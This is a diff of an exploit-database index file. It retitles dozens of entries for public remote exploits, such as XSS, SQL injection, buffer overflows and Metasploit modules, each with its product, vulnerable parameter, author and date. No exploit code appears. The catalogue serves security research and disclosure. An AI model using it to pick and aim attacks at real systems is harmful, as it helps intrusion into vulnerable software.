Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 @@ -14211,7 +14214,7 @@ id,file,description,date,author,platform,type,port 29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection (Metasploit)",2013-11-13,Metasploit,windows,remote,402 29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 29575,platforms/windows/remote/29575.txt,"Plain Old WebServer 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 -29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 - P Parameter Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 +29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 - 'P' Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29614,platforms/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote,0 29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow (Metasploit)",2013-11-18,Metasploit,hardware,remote,80 @@ -14227,7 +14230,7 @@ id,file,description,date,author,platform,type,port 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote,0 29739,platforms/linux/remote/29739.txt,"Apache Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 -29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g - P_OldURL Parameter Cross-Site Scripting",2007-03-16,d3nx,multiple,remote,0 +29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g - 'P_OldURL' Cross-Site Scripting",2007-03-16,d3nx,multiple,remote,0 29752,platforms/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29768,platforms/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 @@ -14279,7 +14282,7 @@ id,file,description,date,author,platform,type,port 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,windows,remote,8080 30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution",2013-12-11,rgod,windows,remote,0 -30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection (Metasploit)",2013-12-11,Metasploit,php,remote,80 +30212,platforms/php/remote/30212.rb,"vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)",2013-12-11,Metasploit,php,remote,80 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 - Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",multiple,remote,0 30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 - Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,multiple,remote,0 @@ -14291,12 +14294,12 @@ id,file,description,date,author,platform,type,port 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server - Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote,0 30257,platforms/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 -30265,platforms/multiple/remote/30265.txt,"SAP Message Server - Group Parameter Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 +30265,platforms/multiple/remote/30265.txt,"SAP Message Server - 'Group' Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 -30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - Parameters Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 +30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - 'ADM:GETLOGFILE?PARAMS' Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 -30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 - Template Parameter Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 +30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30291,platforms/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 @@ -14308,7 +14311,7 @@ id,file,description,date,author,platform,type,port 30469,platforms/linux/remote/30469.rb,"RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,linux,remote,443 31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 -30432,platforms/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 +30432,platforms/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - 'User.Id' Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 @@ -14317,7 +14320,7 @@ id,file,description,date,author,platform,type,port 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080 -30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 +30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 @@ -14338,7 +14341,7 @@ id,file,description,date,author,platform,type,port 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",multiple,remote,0 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 -30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - URL Parameter Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 +30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 30883,platforms/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 @@ -14359,7 +14362,7 @@ id,file,description,date,author,platform,type,port 30622,platforms/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",windows,remote,0 30627,platforms/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",windows,remote,0 30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote,0 -30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 +30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - 'IE' Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30643,platforms/multiple/remote/30643.txt,"DropTeam 1.3.3 - Multiple Remote Vulnerabilities",2007-10-05,"Luigi Auriemma",multiple,remote,0 @@ -14378,7 +14381,7 @@ id,file,description,date,author,platform,type,port 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote,0 30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 - Login procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote,0 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - Buffer Overflow / Remote Command Execution",2007-11-05,"Kevin Finisterre",multiple,remote,0 -30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote,0 +30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote,0 30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 @@ -14387,14 +14390,14 @@ id,file,description,date,author,platform,type,port 30787,platforms/php/remote/30787.rb,"vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80 30816,platforms/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote,0 30819,platforms/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote,0 -30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 -30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 +30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 +30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - 'Download_Plugin.php3' Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting",2007-11-30,"Adrian Pastor",unix,remote,0 30838,platforms/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filterings",2007-12-01,"Carl Hardwick",multiple,remote,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote,0 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,windows,remote,0 30901,platforms/windows/remote/30901.txt,"Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 -30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x - main.swf baseurl Parameter asfunction: Protocol Handler Cross-Site Scripting",2007-12-18,"Rich Cannings",multiple,remote,0 +30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x - 'main.swf?baseurl' asfunction: Protocol Handler Cross-Site Scripting",2007-12-18,"Rich Cannings",multiple,remote,0 30907,platforms/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x - ActiveX Control 'navigateToURL' API Cross Domain Scripting",2007-12-18,"Adam Barth",linux,remote,0 30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764 @@ -14470,7 +14473,7 @@ id,file,description,date,author,platform,type,port 31434,platforms/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,java,remote,8080 31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 -31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 +31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 - 'index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 40354,platforms/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0 @@ -14489,7 +14492,7 @@ id,file,description,date,author,platform,type,port 31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0 -31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe' Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 +31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 @@ -14502,7 +14505,7 @@ id,file,description,date,author,platform,type,port 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31758,platforms/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Stack Overflow",2014-02-19,"Craig Heffner",hardware,remote,80 31759,platforms/windows/remote/31759.txt,"Microsoft Internet Explorer 2 - UTF-7 HTTP Response Handling",2008-05-08,"Yaniv Miron",windows,remote,0 -31767,platforms/multiple/remote/31767.rb,"MediaWiki - Thumb.php Remote Command Execution (Metasploit)",2014-02-19,Metasploit,multiple,remote,80 +31767,platforms/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,multiple,remote,80 31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote,0 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution",2014-02-20,"Julien Ahrens",windows,remote,0 @@ -14597,7 +14600,7 @@ id,file,description,date,author,platform,type,port 32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",hardware,remote,0 32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 -32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 +32564,platforms/multiple/remote/32564.txt,"XWork < 2.0.11.2 - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI redirection",2008-10-15,"Martin Suess",windows,remote,0 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 @@ -14691,8 +14694,8 @@ id,file,description,date,author,platform,type,port 32975,platforms/multiple/remote/32975.txt,"GlassFish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32977,platforms/multiple/remote/32977.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32979,platforms/multiple/remote/32979.txt,"GlassFish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32980,platforms/multiple/remote/32980.txt,"GlassFish Enterprise Server 2.1 - Admin Console /configuration/auditModuleEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32981,platforms/multiple/remote/32981.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32980,platforms/multiple/remote/32980.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/configuration/auditModuleEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32981,platforms/multiple/remote/32981.txt,"GlassFish Enterprise Server 2.1 - Admin Console '/resourceNode/jdbcResourceEdit.jsf?name' Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32994,platforms/multiple/remote/32994.xml,"Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager - Administration Password Disclosure",2009-05-14,"Bernhard Muller",multiple,remote,0 @@ -14751,11 +14754,11 @@ id,file,description,date,author,platform,type,port 33212,platforms/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution (Metasploit)",2014-05-06,Metasploit,windows,remote,0 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote,0 -33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 +33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface 'PATH_INFO' Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - 'scripter.php' Multiple Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 -33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface - Multiple Script m[] Parameter Cross-Site Scripting Vulnerabilities",2009-09-22,"Amir Azam",hardware,remote,0 +33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J - Web Interface (Multiple Script) 'm[]' Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 @@ -14817,11 +14820,11 @@ id,file,description,date,author,platform,type,port 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 -33622,platforms/linux/remote/33622.txt,"Accellion File Transfer - Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 +33622,platforms/linux/remote/33622.txt,"Accellion File Transfer - 'Appliance web_client_user_guide.html?lang' Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33642,platforms/windows/remote/33642.html,"Symantec (Multiple Products) - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote,0 -33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 +33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - 'lang' Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - '/loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 @@ -14850,7 +14853,7 @@ id,file,description,date,author,platform,type,port 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server - Buffer Overflow (Metasploit)",2014-06-19,Metasploit,windows,remote,8080 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,windows,remote,0 -33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'Parameters' Attribute Remote Code Execution",2010-04-08,apoc,linux,remote,0 +33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution",2010-04-08,apoc,linux,remote,0 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor - '.png' Buffer Overflow",2010-04-09,eidelweiss,windows,remote,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",windows,remote,0 @@ -14891,7 +14894,7 @@ id,file,description,date,author,platform,type,port 33980,platforms/windows/remote/33980.txt,"Best Way GEM Engine - Multiple Vulnerabilities",2009-10-12,"Luigi Auriemma",windows,remote,0 33981,platforms/windows/remote/33981.txt,"GameCore 2.5 - 'GameID' Integer Overflow",2010-05-13,"Luigi Auriemma",windows,remote,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,multiple,remote,80 